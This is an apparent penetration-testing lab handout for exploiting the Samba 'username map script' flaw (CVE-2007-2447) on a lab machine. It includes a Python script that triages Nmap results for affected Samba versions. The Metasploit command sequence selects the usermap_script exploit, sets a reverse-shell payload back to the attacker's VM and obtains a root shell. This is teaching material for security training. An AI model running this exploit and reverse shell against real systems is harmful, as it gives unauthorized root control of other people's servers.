Lesson 2 Lab Notes
In this lab we will do the following:
- Use the saved Nmap results to search for the Samba services.
- Use Metasploit to exploit Samba.
- Obtain root access.
What is Samba?
Samba is software that runs on platforms other than Microsoft Windows, for example UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP stack installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it were a Windows file and print server.
CVE Information:
http://www.cvedetails.com/cve/CVE-2007-2447/
CVE-2007-2447: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
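As an added example (not part of the lab notes), the script below reads saved Nmap XML (-oX) results, picks out open Samba smbd ports and flags any whose reported version falls in the CVE-2007-2447 affected range; the XML sample and its host addresses are constructed, and Nmap's fuzzy "3.X - 4.X" version strings are reported as unknown so they get re-checked (e.g. with the smb-os-discovery NSE script) rather than assumed safe.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in nmap -sV -oX layout (not real scan output).
SAMPLE_XML = """<nmaprun>
 <host><address addr="172.16.56.2" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="139"><state state="open"/>
   <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
  <port protocol="tcp" portid="445"><state state="open"/>
   <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
 </ports></host>
 <host><address addr="172.16.56.9" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="445"><state state="open"/>
   <service name="netbios-ssn" product="Samba smbd" version="4.3.11-Ubuntu"/></port>
 </ports></host>
</nmaprun>"""

_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

def version_key(text):
    """Sortable key for '3.0.25rc3' or '3.0.20-Debian'; a release candidate
    sorts before its final release. None if unparseable ('3.X - 4.X')."""
    m = _VER.match(text.strip())
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))

# CVE-2007-2447 affects 3.0.0 through 3.0.25rc3 (3.0.25 final is fixed).
AFFECTED_LOW, AFFECTED_HIGH = version_key("3.0.0"), version_key("3.0.25rc3")

def triage(xml_text):
    """Map (ip, port) -> 'affected' / 'not-affected' / 'unknown-version'
    for every open port whose product string names Samba."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        ip = host.find("address").get("addr")
        for port in host.iter("port"):
            svc = port.find("service")
            if port.find("state").get("state") != "open" or svc is None:
                continue
            if "samba" not in (svc.get("product") or "").lower():
                continue
            key = version_key(svc.get("version") or "")
            if key is None:
                status = "unknown-version"  # follow up with smb-os-discovery
            else:
                status = "affected" if AFFECTED_LOW <= key <= AFFECTED_HIGH else "not-affected"
            findings[(ip, int(port.get("portid")))] = status
    return findings
```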
Module Information:
The Rapid7 module page shows you which Metasploit module to use: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
Exploit-DB shows you the source code of the module: https://www.exploit-db.com/exploits/16320/
Instructions:
We're going to jump right in and select the Samba module in Metasploit:
use exploit/multi/samba/usermap_script
show options
set RHOST 172.16.56.2
show payloads
This time we're going to drop a payload! A payload is the piece of software that lets you control a computer system after it's been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. The payload we're about to select creates a reverse connection back to our VM.
When we use the show payloads command it returns a list of payloads compatible with this exploit. We are going to use cmd/unix/reverse.
set payload cmd/unix/reverse
show options
You will now see the options for the payload. Notice that LHOST, which stands for Local Host, needs to be set; this is your VM's IP address. You'll also want to change LPORT to a different port so you aren't all using the same port in your exploits.
set LHOST 172.16.56.4
set LPORT 8667
exploit
whoami
You will notice that this shell is running as root, and you'll have access to do post-exploitation if you want to. We'll dive deeper into that in later lessons.
Keep forever: http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/